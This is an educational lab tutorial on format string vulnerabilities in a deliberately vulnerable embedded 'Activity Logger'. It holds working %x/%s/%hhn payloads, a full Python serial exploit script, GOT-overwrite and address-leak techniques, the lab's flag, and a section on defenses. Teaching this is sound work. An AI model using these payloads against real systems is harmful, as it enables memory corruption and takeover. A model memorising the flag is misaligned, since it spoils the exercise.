Lab 02: Format String Vulnerability

Introduction

Format string vulnerabilities are a distinct class of memory corruption bug that caught the security community off guard when their exploitability became widely known in 2000. Unlike buffer overflows, which corrupt memory sequentially outward from the overflowed buffer, format string bugs let an attacker read and write arbitrary memory with surgical precision.

Difficulty: Medium
Category: Memory Corruption
Historical Context: WU-FTPD 2.6.0 (June 2000)

Learning Objectives

By completing this lab, you will:

  1. Understand how printf format strings work internally
  2. Master format string exploitation techniques
  3. Learn to read and write arbitrary memory
  4. Develop precision memory corruption skills
  5. Appreciate secure coding practices for output functions

Historical Background

The WU-FTPD Discovery (2000)

In June 2000, a researcher known as "tf8" posted about a critical vulnerability in WU-FTPD 2.6.0, one of the most popular FTP servers. The bug was deceptively simple:

// Simplified illustration of the vulnerable pattern (not the literal WU-FTPD source)
sprintf(buf, user_controlled_string);

This discovery revealed an entire class of vulnerabilities hiding in plain sight. Within weeks, format string bugs were found in:

  • Linux rpc.statd (later exploited by the Ramen worm in 2001)
  • Various telnetd implementations
  • Logging daemons across platforms
  • Embedded device interfaces

Why Format Strings Shocked Security Researchers

  1. Ubiquitous: Printf-family functions everywhere
  2. Powerful: Read/write memory without overflow
  3. Subtle: Easy to introduce, hard to spot
  4. Precise: Byte-level memory manipulation

Vulnerability Overview

How Printf Works

Printf processes format specifiers to display variables:

int value = 42;
printf("Value: %d at %p\n", value, &value);

Format specifiers tell printf how to interpret arguments:

  • %d - Integer from next argument
  • %x - Hexadecimal from next argument
  • %s - String from pointer in next argument
  • %n - Write the number of bytes printed so far to the address given by the next argument

The Vulnerability

When the user controls the format string:

void log_activity(char *user_input) {
    printf(user_input);  // VULNERABLE!
}

No arguments were passed, so printf treats whatever is on the stack as its arguments, and the attacker decides how each value is interpreted:

  • %x - Read stack values
  • %s - Read from arbitrary addresses
  • %n - Write to arbitrary addresses
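
To make the argument walk concrete, here is a minimal Python sketch of how a printf-style function consumes argument slots. It is a toy model, not the lab's embsec_printf: the function name toy_printf is hypothetical, it handles only %x and %N$x, and the stack words are taken from the lab transcript shown later in this document.

```python
import re


def toy_printf(fmt, stack):
    """Toy model: expand %x and %N$x by reading words from `stack`."""
    next_arg = 0  # index of the next sequential argument slot

    def expand(match):
        nonlocal next_arg
        if match.group(1) is not None:
            # Direct parameter access, e.g. %6$x reads slot 6 (1-based)
            index = int(match.group(1)) - 1
        else:
            # Sequential access: each %x consumes the next slot
            index = next_arg
            next_arg += 1
        return format(stack[index], "x")

    return re.sub(r"%(?:(\d+)\$)?x", expand, fmt)


# Stack words as they appear in the lab transcript (slot 6 holds "AAAA")
stack = [0x20000800, 0xDEADBEEF, 0x64, 0x20000810, 0x0, 0x41414141]

print(toy_printf("%x %x %x %x", stack))  # 20000800 deadbeef 64 20000810
print(toy_printf("AAAA%6$x", stack))     # AAAA41414141
```

The caller never supplied these values as arguments. The function simply reads the next slot each time it meets a specifier, which is why a user-supplied format string turns into a stack dump.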

Lab Setup

Prerequisites

  • Completed Lab 01 (Buffer Overflow)
  • Understanding of printf internals
  • Python 3 with pwntools recommended

Getting Started

  1. Build and flash the vulnerable binary:

    cd /labs/02-format-string
    make
    make flash
    

  2. Connect to the target:

    screen /dev/ttyACM0 115200
    

  3. Explore the application:

    =================================
        Activity Logger v2.1
        Enhanced Security Edition
    =================================
    
    1. Log activity
    2. Check authentication
    3. Show hints
    4. Reset
    

Understanding the Target

Application Overview

The system is an "activity logger" with:

  • Logging Function: Vulnerable printf call
  • Authentication Check: Requires specific value in memory
  • Debug Hints: Shows important addresses
  • Stack Canary: Monitors for corruption

The Vulnerable Code

void log_activity(char *user_input)
{
    embsec_printf("Activity logged: ");
    embsec_printf(user_input);  // FORMAT STRING BUG!
    embsec_printf("\n");
}

The Goal

Set the authenticated variable to 0x41414141 to get the flag.

Vulnerability Analysis

Step 1: Confirm the Vulnerability

Test with format specifiers:

Enter activity to log: %x %x %x %x
Activity logged: 20000800 deadbeef 64 20000810

Success! We're reading stack values.

Step 2: Information Gathering

Use option 3 for hints:

=== System Information ===
Stack canary: 0xDEADBEEF (watching for corruption)
Auth variable: 0x20000C00 (current value: 0x00000000)
Auth success value: 0x41414141

Critical information:

  • Target address: 0x20000C00
  • Required value: 0x41414141
  • Stack canary present (but irrelevant here: %n writes go straight to the target address and never touch the canary)

Step 3: Find Input Position

Locate our input on the stack:

Enter activity to log: AAAA %x %x %x %x %x %x
Activity logged: AAAA 20000800 deadbeef 64 20000810 0 41414141

Our input "AAAA" (0x41414141) is at position 6!
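
Counting positions by eye gets error-prone with longer dumps. The following sketch automates the lookup, assuming the logged line has the same shape as the transcript above: the echoed marker followed by space-separated hex words. The helper name find_input_position is hypothetical.

```python
def find_input_position(logged, marker=b"AAAA"):
    """Return the 1-based argument position whose leaked word equals the marker.

    `logged` is the text after "Activity logged: ", i.e. the echoed marker
    followed by the hex words produced by the %x specifiers.
    """
    echoed = marker.decode("ascii")
    if not logged.startswith(echoed):
        raise ValueError("expected the echoed marker at the start of the output")

    # The marker bytes appear on the stack as one little-endian word
    wanted = int.from_bytes(marker, "little")

    # Drop the echoed marker so it is not mistaken for a leaked word
    words = logged[len(echoed):].split()
    for position, word in enumerate(words, start=1):
        if int(word, 16) == wanted:
            return position
    return None  # marker not reached; send more %x specifiers


line = "AAAA 20000800 deadbeef 64 20000810 0 41414141"
print(find_input_position(line))  # 6
```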

Step 4: Direct Parameter Access

Verify using direct parameter access:

Enter activity to log: AAAA%6$x
Activity logged: AAAA41414141

Perfect! We can reference our input directly.

Format String Techniques

1. Memory Reading

Reading Stack Values:

%x %x %x %x        # Read 4 stack values
%6$x               # Read 6th parameter directly
%100x              # Read with width (padding)

Reading Arbitrary Memory:

import struct

# Place the address at the start of the input (argument 6 in this lab),
# then use %s to dereference it
addr = 0x20000100
payload = struct.pack('<I', addr)
payload += b'%6$s'  # Read string from addr

2. Memory Writing

The %n Specifier:

  • Writes number of bytes printed so far
  • Takes address from stack parameter
  • Variants: %n (4 bytes), %hn (2 bytes), %hhn (1 byte)

Basic Write:

import struct
target_addr = 0x20000C00  # example: the lab's auth variable

# Write value 100 to address
payload = struct.pack('<I', target_addr)  # 4 bytes printed so far
payload += b'%96x'   # Print 96 more chars (total 100)
payload += b'%6$n'   # Write 100 to target_addr

3. Precision Writing

For exact values, use width specifiers:

import struct
target = 0x20000C00  # example: the lab's auth variable

# Write 0x41 to single byte
payload = struct.pack('<I', target)
# Already printed 4 bytes (address)
payload += b'%61c'   # Print 61 chars (total 65 = 0x41)
payload += b'%6$hhn' # Write single byte
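
The width arithmetic generalizes: %hhn stores only the low byte of the running character count, so the padding needed is the difference modulo 256. The sketch below shows that calculation. The helper names padding_for and pad_spec are hypothetical, and it assumes the target printf honours the width on %c.

```python
def padding_for(target_byte, printed):
    """Extra characters needed so (printed + padding) & 0xFF == target_byte."""
    return (target_byte - printed) % 256


def pad_spec(padding):
    """Format-string fragment that prints `padding` characters (empty if none)."""
    return f"%{padding}c".encode() if padding else b""


print(padding_for(0x41, 4))     # 61: one address already printed
print(padding_for(0x41, 16))    # 49: four addresses already printed
print(padding_for(0x10, 0x41))  # 207: count wraps, 65 + 207 = 272 = 0x110
print(pad_spec(61))             # b'%61c'
```

The wraparound case matters when a later byte is smaller than the count already printed: the count cannot go down, so it has to be pushed past the next multiple of 256.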

Exploitation

Understanding the Target Value

We need to write 0x41414141:

  • 4 bytes, each containing 0x41
  • Decimal value: 65 ('A' in ASCII)

Exploitation Strategy

Write each byte separately using %hhn:

  1. Place 4 addresses on stack (target+0, +1, +2, +3)
  2. Use width specifiers to control bytes printed
  3. Write 0x41 to each address sequentially

Building the Exploit

#!/usr/bin/env python3
import struct
import serial
import time

# Target configuration
target_addr = 0x20000C00
target_value = 0x41414141

# Serial setup
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=1)

def send_command(cmd):
    ser.write(cmd.encode() + b'\n')
    time.sleep(0.1)

# Navigate to log activity
send_command('1')

# Build format string payload
payload = b''

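# Place 4 addresses on stack
# Caveat: every 0x2000xxxx address contains 0x00 bytes, so this works only if
# the target's input routine and embsec_printf pass NUL bytes through; a
# standard C printf stops parsing the format string at the first NUL.
for i in range(4):
    payload += struct.pack('<I', target_addr + i)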

# We've printed 16 bytes (4 addresses * 4 bytes each)
# Need to print 65 total for 0x41

# First byte: need 65 - 16 = 49 more
payload += b'%49c%6$hhn'

# Subsequent bytes: already at 65, just write
payload += b'%7$hhn'
payload += b'%8$hhn'
payload += b'%9$hhn'

# Send exploit
ser.write(payload + b'\n')

# Check authentication
time.sleep(0.5)
send_command('2')

# Read flag
response = ser.read(2000)
print(response.decode('latin-1'))

# Release the serial port
ser.close()

Manual Exploitation Steps

  1. Calculate addresses:

    for i in range(4):
        print(f"Address {i}: 0x{0x20000C00 + i:08x}")
    

  2. Build payload:

    import struct
    p = b''
    p += struct.pack('<I', 0x20000C00)
    p += struct.pack('<I', 0x20000C01)
    p += struct.pack('<I', 0x20000C02)
    p += struct.pack('<I', 0x20000C03)
    p += b'%49c%6$hhn%7$hhn%8$hhn%9$hhn'
    print(repr(p))
    

  3. Execute:

    • Select option 1
    • Paste payload
    • Select option 2
    • Get flag!
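
Before sending anything to the board, it can help to dry-run the payload offline and confirm which bytes it would write. The sketch below is a deliberately narrow simulator, not a printf implementation: it understands only %<width>c and %<pos>$hhn, assumes the payload itself begins at argument position 6 as found in Step 3, and ignores the NUL-byte question entirely. The name dry_run is hypothetical.

```python
import re
import struct

# Only the two specifier forms used by the lab payload are recognised
SPEC = re.compile(rb"%(?:(\d+)c|(\d+)\$hhn)")


def dry_run(payload, first_pos=6):
    """Return {address: byte} for every %hhn write the payload would perform."""
    memory = {}
    printed = 0  # running count of characters output so far
    i = 0
    while i < len(payload):
        match = SPEC.match(payload, i)
        if match is None:
            printed += 1  # ordinary byte, echoed as-is
            i += 1
            continue
        if match.group(1) is not None:
            # %<width>c prints max(width, 1) characters
            printed += max(int(match.group(1)), 1)
        else:
            # %<pos>$hhn: the argument is a 4-byte word inside the payload
            offset = (int(match.group(2)) - first_pos) * 4
            (addr,) = struct.unpack_from("<I", payload, offset)
            memory[addr] = printed & 0xFF
        i = match.end()
    return memory


p = b"".join(struct.pack("<I", 0x20000C00 + i) for i in range(4))
p += b"%49c%6$hhn%7$hhn%8$hhn%9$hhn"

writes = dry_run(p)
value = sum(writes[0x20000C00 + i] << (8 * i) for i in range(4))
print(hex(value))  # 0x41414141
```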

Expected Result

Choice: 2
ACCESS GRANTED!
Flag: embsec{f0rm4t_str1ng_wr1t3_4cc3ss}
Critical system compromise detected!

Advanced Techniques

1. Large Value Writes

Writing large values efficiently:

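import struct

# Write 0xdeadbeef to `target` one byte at a time (little-endian target)
# Memory layout: target+0 = 0xef, +1 = 0xbe, +2 = 0xad, +3 = 0xde
# Write in ascending value order (0xad, 0xbe, 0xde, 0xef) so the
# printed-character count only ever has to grow

target = 0x20000C00  # example address; substitute your own
values = [(0xef, 0), (0xbe, 1), (0xad, 2), (0xde, 3)]  # (byte value, offset)

payload = b''
# Place addresses in offset order, so target+N sits at position 6+N
for offset in range(4):
    payload += struct.pack('<I', target + offset)

printed = 16
for value, offset in sorted(values):
    needed = value - printed
    if needed > 0:
        payload += f'%{needed}c'.encode()
    payload += f'%{6+offset}$hhn'.encode()
    printed = value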

2. GOT Overwrite

Overwrite Global Offset Table entries:

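# GOT entry for printf (placeholder address; take the real one from the ELF)
got_printf = 0x20001234

# Address of attacker-controlled code (placeholder)
shellcode_addr = 0x20000500

# Write shellcode_addr to got_printf with four %hhn byte writes,
# the same way the auth variable was written above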

3. Stack Pivot

Use format string to modify stack pointer:

# Write to saved stack pointer
# Pivot to controlled memory
# Execute ROP chain

4. Information Disclosure

Leak critical addresses:

import struct

# Leak stack canary (position 39 is illustrative; find the real one by probing)
payload = b'%39$x'

# Leak return addresses
payload = b'%40$x'  # Find saved EIP/LR

# Leak library addresses (bypass ASLR)
got_entry = 0x20001234  # placeholder GOT address
payload = struct.pack('<I', got_entry)
payload += b'%6$s'  # Dereference GOT
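
Offsets such as 39 and 40 differ from target to target, so in practice they are found by dumping a range of positions and inspecting the words. The sketch below builds such a probe and parses the reply. The helper names are hypothetical, and it assumes the target printf supports direct parameter access together with the 0 flag and a width (%N$08x).

```python
def make_probe(start, count):
    """Build b'%<start>$08x.%<start+1>$08x...' to dump `count` stack words."""
    specs = [f"%{pos}$08x".encode() for pos in range(start, start + count)]
    return b".".join(specs)


def parse_probe(output, start):
    """Map each argument position to the word it leaked."""
    words = output.strip().split(".")
    return {start + i: int(word, 16) for i, word in enumerate(words)}


print(make_probe(6, 3))  # b'%6$08x.%7$08x.%8$08x'

# Example reply text (made up for illustration, not captured from the board)
leaked = parse_probe("41414141.deadbeef.00000064", start=6)
print(hex(leaked[7]))    # 0xdeadbeef
```

Fixed-width fields with a separator keep the words unambiguous even when a value contains leading zeros.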

Defensive Measures

Immediate Fixes

  1. Never Use User Input as Format String:

    // Vulnerable
    printf(user_input);
    snprintf(buf, size, user_input);
    syslog(LOG_INFO, user_input);
    
    // Secure
    printf("%s", user_input);
    snprintf(buf, size, "%s", user_input);
    syslog(LOG_INFO, "%s", user_input);
    

  2. Use Format String Literals:

    // Use string literals when possible
    #define LOG_FORMAT "[%s] User: %s, Action: %s\n"
    printf(LOG_FORMAT, timestamp, user, action);
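
For a quick review pass over a codebase, a rough script can flag calls whose format argument is not a string literal. The sketch below is only a line-based heuristic under stated assumptions: the function list and the name suspicious_calls are illustrative, it splits arguments on commas naively, and it will also flag macros such as LOG_FORMAT that expand to literals. The compiler warnings in the next section are the more reliable check.

```python
import re

# Index of the format argument for a few printf-family functions
FORMAT_INDEX = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2, "syslog": 1}

CALL = re.compile(r"\b(printf|fprintf|sprintf|snprintf|syslog)\s*\(([^;]*)\)\s*;")


def suspicious_calls(source):
    """Return (line number, line) pairs where the format is not a literal."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in CALL.finditer(line):
            name, args = match.group(1), match.group(2)
            parts = [arg.strip() for arg in args.split(",")]
            index = FORMAT_INDEX[name]
            # A literal format starts with a double quote
            if index < len(parts) and not parts[index].startswith('"'):
                hits.append((lineno, line.strip()))
    return hits


sample = """\
printf(user_input);
snprintf(buf, size, user_input);
syslog(LOG_INFO, user_input);
printf("%s", user_input);
snprintf(buf, size, "%s", user_input);
syslog(LOG_INFO, "%s", user_input);
"""

for lineno, text in suspicious_calls(sample):
    print(lineno, text)
```

On the sample, only the first three calls are reported.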
    

Compiler Protections

Enable format string warnings:

CFLAGS += -Wformat=2
CFLAGS += -Wformat-security
CFLAGS += -Werror=format-security

Runtime Protections

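  1. FORTIFY_SOURCE (a glibc feature; it needs optimization enabled, for example -O2, and then aborts when %n appears in a format string held in writable memory):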

    CFLAGS += -D_FORTIFY_SOURCE=2
    

  2. Stack Canaries (limited effectiveness against format strings)

  3. RELRO (Relocation Read-Only):

    LDFLAGS += -Wl,-z,relro,-z,now
    

Common Pitfalls

1. Parameter Counting

Problem: Wrong position for direct parameter access
Solution: Test with AAAA and %x to find position

2. Alignment Issues

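Problem: %n (4-byte) and %hn (2-byte) writes can fault at unaligned addresses on some ARM cores
Solution: Align the target to the write size, or use byte-wide %hhn writes, which have no alignment requirement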

3. Width Calculation

Problem: Incorrect byte counts for %n
Solution: Track bytes printed carefully, including addresses

4. Format String Limits

Problem: Some implementations limit width specifiers
Solution: Use multiple writes or find alternatives

Real-World Impact

Format string bugs in the wild:

Historical Exploits

  • 2000: WU-FTPD 2.6.0 remote root
  • 2001: Linux rpc.statd (Ramen worm)
  • 2002: OpenBSD ftpd
  • 2003: Linux kernel vsprintf

Modern Occurrences

  • 2012: sudo format string in debug logging (CVE-2012-0809)
  • 2020: Windows Print Spooler
  • IoT Devices: Common in embedded systems
  • Web Applications: Printf-style template engines

Comparison with Buffer Overflows

Aspect              Buffer Overflow         Format String
Discovery           Obvious pattern         Subtle mistake
Precision           Sequential corruption   Surgical writes
Read Capability     Limited                 Extensive
Write Capability    Sequential              Arbitrary
Bypass Protections  Harder                  Often easier
Complexity          Lower                   Higher

Key Takeaways

  1. Format String Power: Read/write anywhere without overflow
  2. Always Use %s: Never pass user input as format string
  3. Compiler Warnings: Enable and heed format warnings
  4. Defense in Depth: Multiple protections needed
  5. Code Review: Look for printf-family vulnerabilities

Challenges

Challenge 1: Blind Exploitation

No debug output - can you still exploit?

  • Use %x to map memory
  • Find addresses through leaks
  • Brute force if necessary

Challenge 2: Limited Input Length

Only 32 bytes allowed:

  • Use short writes (%hn)
  • Multiple exploitation rounds
  • Leverage existing values
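
As a starting point for the first hint, the sketch below builds a two-write payload with %hn. It assumes the same conditions as the main lab (input at argument position 6, little-endian target, a printf that supports %hn and large widths); the function name build_halfword_writes is hypothetical. The trade-off is a much longer output: the target prints thousands of padding characters.

```python
import struct


def build_halfword_writes(addr, value, first_pos=6):
    """Write a 32-bit value as two 16-bit halves using %hn."""
    halves = [(addr, value & 0xFFFF), (addr + 2, (value >> 16) & 0xFFFF)]

    # Two addresses instead of four: 8 bytes of payload rather than 16
    payload = b"".join(struct.pack("<I", a) for a, _ in halves)
    printed = len(payload)

    for i, (_, half) in enumerate(halves):
        # %hn stores the low 16 bits of the count, so wrap modulo 0x10000
        pad = (half - printed) % 0x10000
        if pad:
            payload += f"%{pad}c".encode()
        payload += f"%{first_pos + i}$hn".encode()
        printed += pad
    return payload


p = build_halfword_writes(0x20000C00, 0x41414141)
print(p[8:])   # b'%16697c%6$hn%7$hn'
print(len(p))  # 25
```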

Challenge 3: ASLR Enabled

Randomized addresses:

  • Leak base addresses first
  • Use relative offsets
  • Partial overwrites

Further Reading

Historical Documents

  • tf8's original WU-FTPD advisory
  • CERT Advisory CA-2000-13
  • Ramen worm analysis

Modern Research

  • Format string compiler defenses
  • Automated vulnerability detection
  • Format string fuzzing techniques

Next Steps

Congratulations on mastering format string exploitation! You've learned:

  • How printf processes format specifiers
  • Reading stack values with %x and arbitrary memory with %s
  • Writing arbitrary memory with %n
  • Precision memory corruption techniques
  • Why format string bugs are dangerous

Consider exploring:

  • Advanced ROP techniques
  • Heap exploitation methods
  • Integer overflow vulnerabilities
  • Race conditions in embedded systems

"With great power comes great responsibility" - Always use format strings safely!